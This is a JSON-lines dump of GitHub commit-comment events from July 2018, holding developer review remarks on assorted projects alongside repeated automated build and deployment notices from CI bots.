{"id":"8018287864","type":"CommitCommentEvent","actor":{"login":"martha-thomae"},"repo":{"name":"DDMAL/CMN-MEI_to_MensuralMEI_Translator"},"payload":{"comment":{"id":29833327,"position":22,"line":102,"path":"MEI_Translator.py","commit_id":"f6e093e1d7b068ee9ac57bf303a322fc6a143c6b","created_at":"2018-07-25T18:36:12Z","updated_at":"2018-07-25T18:36:12Z","author_association":"COLLABORATOR","body":"This line takes all the elements of the document's tree from the last change in mensuration to the end (this is, the end of the document). This works fine in the case of the lowest voice, because the end of the document coincides with the end of the voice, so we indeed capture the segment of all the notes and rests in the last part of the voice. But this did not work in the case of the upper voices, because the end of the document does not coincide with the end of the voice. Therefore, the elements_in_between capture elements that belong to the last part of the voice together with all the elements that belong to all the voices that lie below."}},"created_at":"2018-07-25T18:36:12Z"}
{"id":"8018289953","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833333,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-25T18:36:36Z","updated_at":"2018-07-25T18:36:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:36:36Z"}
{"id":"8018294539","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833344,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-25T18:37:29Z","updated_at":"2018-07-25T18:37:29Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-25T18:37:29Z"}
{"id":"8018295032","type":"CommitCommentEvent","actor":{"login":"cmorton11"},"repo":{"name":"UWPCE-PythonCert-ClassRepos/Self_Paced-Online"},"payload":{"comment":{"id":29833346,"position":null,"line":null,"path":null,"commit_id":"0c301b6a3a4178e5e418cd6081370fb349cb01be","created_at":"2018-07-25T18:37:35Z","updated_at":"2018-07-25T18:37:35Z","author_association":"NONE","body":"Readme file Git pull request test"}},"created_at":"2018-07-25T18:37:35Z"}
{"id":"8018296322","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833349,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-25T18:37:49Z","updated_at":"2018-07-25T18:37:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:37:49Z"}
{"id":"8018302797","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833356,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-25T18:39:03Z","updated_at":"2018-07-25T18:39:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:39:03Z"}
{"id":"8018303250","type":"CommitCommentEvent","actor":{"login":"IhateTrains"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29833359,"position":17,"line":32590,"path":"WTWSMS/common/dynasties/00_dynasties.txt","commit_id":"fe171435daaa43d1414df8bc5a1c823bcbbfa3e0","created_at":"2018-07-25T18:39:08Z","updated_at":"2018-07-25T18:39:08Z","author_association":"COLLABORATOR","body":"Wouldn't Damaskites be better for a greek dynasty?"}},"created_at":"2018-07-25T18:39:08Z"}
{"id":"8018303518","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29833360,"position":180,"line":180,"path":"device/sensor/drv/drv_co2_sensirion_scd30.c","commit_id":"833c7ac86b6fe1b8c11d9c29e1150b9cee9415cf","created_at":"2018-07-25T18:39:11Z","updated_at":"2018-07-25T18:39:11Z","author_association":"NONE","body":"`const size_t size = sizeof(co2_data_t);`"}},"created_at":"2018-07-25T18:39:11Z"}
{"id":"8018306030","type":"CommitCommentEvent","actor":{"login":"FndNur1Labs"},"repo":{"name":"cryptonotefoundation/cryptonote"},"payload":{"comment":{"id":29833367,"position":null,"line":null,"path":null,"commit_id":"dfb915c518f404da4cda6bedda9ca93f7087bf35","created_at":"2018-07-25T18:39:37Z","updated_at":"2018-07-25T18:39:37Z","author_association":"NONE","body":"oh well this fixed last"}},"created_at":"2018-07-25T18:39:37Z"}
{"id":"8018306539","type":"CommitCommentEvent","actor":{"login":"IhateTrains"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29833369,"position":11,"line":32585,"path":"WTWSMS/common/dynasties/00_dynasties.txt","commit_id":"fe171435daaa43d1414df8bc5a1c823bcbbfa3e0","created_at":"2018-07-25T18:39:44Z","updated_at":"2018-07-25T18:39:44Z","author_association":"COLLABORATOR","body":"Wouldn't Athenites be better for a greek dynasty?"}},"created_at":"2018-07-25T18:39:44Z"}
{"id":"8018306907","type":"CommitCommentEvent","actor":{"login":"amoothart"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29833371,"position":2,"line":2,"path":"settings.gradle","commit_id":"3d9ef9551dc48ca69db33ffabb155a07770500dd","created_at":"2018-07-25T18:39:48Z","updated_at":"2018-07-25T18:39:48Z","author_association":"NONE","body":"(Test Comment)\r\nDid this allow you to successfully open and run the project in IntelliJ?"}},"created_at":"2018-07-25T18:39:48Z"}
{"id":"8018307895","type":"CommitCommentEvent","actor":{"login":"martha-thomae"},"repo":{"name":"DDMAL/CMN-MEI_to_MensuralMEI_Translator"},"payload":{"comment":{"id":29833373,"position":36,"line":115,"path":"MEI_Translator.py","commit_id":"f6e093e1d7b068ee9ac57bf303a322fc6a143c6b","created_at":"2018-07-25T18:39:59Z","updated_at":"2018-07-25T18:39:59Z","author_association":"COLLABORATOR","body":"Solution for issue # 2:\r\nIssue # 2 is fixed here (in this 'else' block). Now the elements_in_between capture the elements that happen after the change in mensuration until the end of the voice, which is meant to be happen where the next <staff> element is (so, where the next voice starts) for the upper voices. \r\nFor the lower voices, we still consider the end of the voice as the end of the document (see 'if' block)."}},"created_at":"2018-07-25T18:39:59Z"}
{"id":"8018309550","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833376,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-25T18:40:19Z","updated_at":"2018-07-25T18:40:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:40:19Z"}
{"id":"8018310364","type":"CommitCommentEvent","actor":{"login":"MaxBazarov"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29833379,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-25T18:40:28Z","updated_at":"2018-07-25T18:40:28Z","author_association":"OWNER","body":"Btw, do you need the “Previous Artboard” feature?\nPersosnally me not.  But we support it.\n\nOn 25/07/2018, cpshanley <notifications@github.com> wrote:\n> Hi Max. Love the plugin. Don't know what a customised link is, though! Does\n> this allow for a 'Previous artboard' link in Sketch?\n>\n> Also, would be lovely to see overlay support.\n>\n> Keep it up!\n>\n> --\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/MaxBazarov/exporter/commit/9851093614f4d4eac955f0a2abff3fa1aca79c5d#commitcomment-29833175\n"}},"created_at":"2018-07-25T18:40:28Z"}
{"id":"8018310595","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29833381,"position":4,"line":16,"path":"device/sensor/sensor.mk","commit_id":"833c7ac86b6fe1b8c11d9c29e1150b9cee9415cf","created_at":"2018-07-25T18:40:31Z","updated_at":"2018-07-25T18:40:31Z","author_association":"NONE","body":"resolve conflict ;)"}},"created_at":"2018-07-25T18:40:31Z"}
{"id":"8018311046","type":"CommitCommentEvent","actor":{"login":"akash-mohandas"},"repo":{"name":"eesha919/Data-Visualization-in-VR"},"payload":{"comment":{"id":29833383,"position":null,"line":null,"path":null,"commit_id":"84414be197ff1659c1ce08df6d76834e8fd6cfd7","created_at":"2018-07-25T18:40:35Z","updated_at":"2018-07-25T18:40:35Z","author_association":"NONE","body":"Hi, \r\n\r\nI am just getting started with Data Visualization in Unity VR. I saw the video of your work on Youtube. Can I know how exactly this is done ? I am really interested in this and want to know how do I go about to learn to develop one. Any tips and guidelines are appreciated.\r\n\r\nThanks,\r\nAkash Das"}},"created_at":"2018-07-25T18:40:35Z"}
{"id":"8018312287","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833389,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-25T18:40:50Z","updated_at":"2018-07-25T18:40:50Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-25T18:40:50Z"}
{"id":"8018313324","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conda-smithy-feedstock"},"payload":{"comment":{"id":29833392,"position":null,"line":null,"path":null,"commit_id":"d877cfebfc6f043aa99f1b4134b0c9e6e6ad512d","created_at":"2018-07-25T18:41:01Z","updated_at":"2018-07-25T18:41:01Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @isuruf-bot was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @cj-wright was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-25T18:41:01Z"}
{"id":"8018314119","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29833393,"position":null,"line":null,"path":null,"commit_id":"215302f06db153bea96ce6f2e805e4774d4c189d","created_at":"2018-07-25T18:41:11Z","updated_at":"2018-07-25T18:41:11Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2326 of 2326 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-25T18:41:11Z"}
{"id":"8018314793","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833396,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-25T18:41:19Z","updated_at":"2018-07-25T18:41:19Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-25T18:41:19Z"}
{"id":"8018315537","type":"CommitCommentEvent","actor":{"login":"Sphar-io"},"repo":{"name":"Sphar-io/corda-training-solutions"},"payload":{"comment":{"id":29833400,"position":2,"line":2,"path":"settings.gradle","commit_id":"3d9ef9551dc48ca69db33ffabb155a07770500dd","created_at":"2018-07-25T18:41:27Z","updated_at":"2018-07-25T18:41:27Z","author_association":"OWNER","body":"I was able to successfully run the kotlin components, and the gradle tasks were split into those two groups\r\n"}},"created_at":"2018-07-25T18:41:27Z"}
{"id":"8018316091","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833403,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-25T18:41:33Z","updated_at":"2018-07-25T18:41:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:41:33Z"}
{"id":"8018318373","type":"CommitCommentEvent","actor":{"login":"creachadair"},"repo":{"name":"google/kythe"},"payload":{"comment":{"id":29833413,"position":32,"line":171,"path":"kythe/go/test/testutil/testutil.go","commit_id":"217b6b33ac73662c2de38d0351a3029e5e4f692b","created_at":"2018-07-25T18:41:58Z","updated_at":"2018-07-25T18:41:58Z","author_association":"CONTRIBUTOR","body":"`return diff == \"\", diff`"}},"created_at":"2018-07-25T18:41:58Z"}
{"id":"8018320153","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29833418,"position":20,"line":20,"path":"repondeur/db_migrations/versions/753db774ddb8_add_amendement_parent_column.py","commit_id":"9ebf92f6cadd1b297aa048d4b14946dc33677663","created_at":"2018-07-25T18:42:19Z","updated_at":"2018-07-25T18:42:19Z","author_association":"COLLABORATOR","body":"Feel free to remove the comments when you're happy with the generated revision"}},"created_at":"2018-07-25T18:42:19Z"}
{"id":"8018321096","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29833421,"position":null,"line":null,"path":null,"commit_id":"215302f06db153bea96ce6f2e805e4774d4c189d","created_at":"2018-07-25T18:42:30Z","updated_at":"2018-07-25T18:42:30Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-215302f06db153bea96ce6f2e805e4774d4c189d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-25T18:42:30Z"}
{"id":"8018322703","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833425,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-25T18:42:49Z","updated_at":"2018-07-25T18:42:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:42:49Z"}
{"id":"8018327696","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29833433,"position":null,"line":null,"path":null,"commit_id":"a44a9fdad612aff807239cd72eb765a6f6350b1b","created_at":"2018-07-25T18:43:45Z","updated_at":"2018-07-25T18:43:45Z","author_association":"CONTRIBUTOR","body":"@colemickens Why was an empty `default.nix` file added to the repository in this commit?"}},"created_at":"2018-07-25T18:43:45Z"}
{"id":"8018328524","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29833435,"position":null,"line":null,"path":null,"commit_id":"8034324fc10d1cdf342355c909575474fec4f6b1","created_at":"2018-07-25T18:43:55Z","updated_at":"2018-07-25T18:43:55Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-387](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-387).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-387-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-25T18:43:55Z"}
{"id":"8018329349","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833439,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-25T18:44:06Z","updated_at":"2018-07-25T18:44:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:44:06Z"}
{"id":"8018331487","type":"CommitCommentEvent","actor":{"login":"benjaminfuller"},"repo":{"name":"pacificr/Clusion"},"payload":{"comment":{"id":29833448,"position":null,"line":null,"path":null,"commit_id":"bcce48a87c15625c63029616abac30d350d27bfc","created_at":"2018-07-25T18:44:31Z","updated_at":"2018-07-25T18:44:31Z","author_association":"NONE","body":"In the definition of Printer, do you want the levels to have an explicit ordering?  Right now the way I read it, when level is EXTRA it will only print EXTRA statements not DEBUG statements.  Am I reading this wrong?"}},"created_at":"2018-07-25T18:44:31Z"}
{"id":"8018334338","type":"CommitCommentEvent","actor":{"login":"jamesliu08"},"repo":{"name":"hack4Impactuchicago/greenworks-dashboard"},"payload":{"comment":{"id":29833453,"position":null,"line":null,"path":null,"commit_id":"a3622232ceccbdb0e987c0b09ab76f922f5a2b0a","created_at":"2018-07-25T18:45:05Z","updated_at":"2018-07-25T18:45:05Z","author_association":"NONE","body":"dfg"}},"created_at":"2018-07-25T18:45:05Z"}
{"id":"8018335830","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29833459,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-25T18:45:22Z","updated_at":"2018-07-25T18:45:22Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T18:45:22Z"}
{"id":"8018337815","type":"CommitCommentEvent","actor":{"login":"thartharkyee"},"repo":{"name":"BKadishAdFin/kind"},"payload":{"comment":{"id":29833464,"position":null,"line":null,"path":null,"commit_id":"a3086f9c9145e8fd4777cd71f8a35cb4ee8694ba","created_at":"2018-07-25T18:45:44Z","updated_at":"2018-07-25T18:45:44Z","author_association":"NONE","body":"a3086f9"}},"created_at":"2018-07-25T18:45:44Z"}
{"id":"8018338599","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29833466,"position":null,"line":null,"path":null,"commit_id":"1ddfd5dff7dd22eddf396fee53497db001b4bb02","created_at":"2018-07-25T18:45:53Z","updated_at":"2018-07-25T18:45:53Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-triag](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-triag).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-triag-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T18:45:53Z"}
{"id":"8018339731","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29833472,"position":null,"line":null,"path":null,"commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-25T18:46:07Z","updated_at":"2018-07-25T18:46:07Z","author_association":"MEMBER","body":"The problem we had today isn't things don't work, but that there's too much complexity. Few people understand what I've done besides myself. My solution is that, now that things work, to remove the complexity so there's simply less to understand.\r\n\r\nI agree libgcc is messy, but the others are less bad according to Exherbo. Also, note that little of that stuff has changed for them in 3 years; I suspect it only would be change due to people upstreaming this exact use-case.\r\n\r\nMost importantly, the complexity of this derivation is *local*. It's contained to the derivation and users of the derivation don't need to care. This is the opposite of, e.g., all the `CXXSTDLIB` and `/nix-store/cc-cflags` type hacks which complicate everything and cause problems constantly.\r\n\r\n> I don't see musl-cross-make doing any of this stuff? \r\n\r\nI suppose `musl-cross-make` does the opposite, making everything in one big invocation, but the principle is the same: don't rebuild stuff unnecessarily and don't group compilers and libraries together in arbitrary ways. (If everything is grouped together, it's not arbitrary!)\r\n\r\n`musl-cross-make` does less because the newly built gcc is indeed being used to build other other stuff, so it's intermediate build products are available.\r\n\r\n> `git grep libgcc.mvars` returns no results.\r\n\r\nThe specific example of `libgcc.mvars` is to not cause building this included makefile to pull in gcc itself.\r\n\r\n"}},"created_at":"2018-07-25T18:46:07Z"}
{"id":"8018340511","type":"CommitCommentEvent","actor":{"login":"thartharkyee"},"repo":{"name":"BKadishAdFin/kind"},"payload":{"comment":{"id":29833473,"position":null,"line":null,"path":null,"commit_id":"a3086f9c9145e8fd4777cd71f8a35cb4ee8694ba","created_at":"2018-07-25T18:46:16Z","updated_at":"2018-07-25T18:46:16Z","author_association":"NONE","body":"a3086f9"}},"created_at":"2018-07-25T18:46:16Z"}
